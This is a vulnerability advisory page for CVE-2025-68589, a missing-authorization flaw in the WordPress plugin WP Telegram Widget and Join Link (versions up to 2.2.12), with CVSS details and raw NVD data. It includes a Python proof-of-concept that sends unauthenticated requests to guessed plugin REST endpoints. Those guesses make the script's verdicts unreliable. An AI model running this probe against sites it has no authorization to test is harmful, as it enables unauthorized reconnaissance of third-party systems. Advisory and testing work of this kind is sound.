Security Vulnerability Report
中文
CVE-2025-68589 CVSS 5.3 MEDIUM

CVE-2025-68589

Published: 2025-12-24 13:16:26
Last Modified: 2026-04-27 19:16:34

Description

Missing Authorization vulnerability in WP Socio WP Telegram Widget and Join Link wptelegram-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Telegram Widget and Join Link: from n/a through <= 2.2.12.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

wptelegram-widget <= 2.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68589 PoC - Missing Authorization in wptelegram-widget # Affected Version: <= 2.2.12 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68589 Missing Authorization vulnerability in wptelegram-widget plugin """ # Common REST API endpoints that might be affected endpoints = [ '/wp-json/wptelegram/v1/', '/wp-json/wptelegram/v2/', '/wp-json/wptelegram-widget/v1/', '/wp-json/wptelegram-widget/v2/', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68589 - Missing Authorization in wptelegram-widget\n") vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {url}") try: # Send unauthenticated GET request response = requests.get(url, timeout=10, verify=False) # Check if we get a successful response without authentication if response.status_code == 200: print(f"[+] POTENTIALLY VULNERABLE: {url}") print(f" Status Code: {response.status_code}") print(f" Response: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") else: print(f"[*] Endpoint returned: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") if vulnerable: print("\n[!] Target appears to be vulnerable to CVE-2025-68589") print("[!] Recommendation: Update wptelegram-widget plugin to version > 2.2.12") else: print("\n[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68589_poc.py <target_url>") print("Example: python cve-2025-68589_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68589", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.220", "lastModified": "2026-04-27T19:16:34.420", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Socio WP Telegram Widget and Join Link wptelegram-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Telegram Widget and Join Link: from n/a through <= 2.2.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wptelegram-widget/vulnerability/wordpress-wp-telegram-widget-and-join-link-plugin-2-2-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}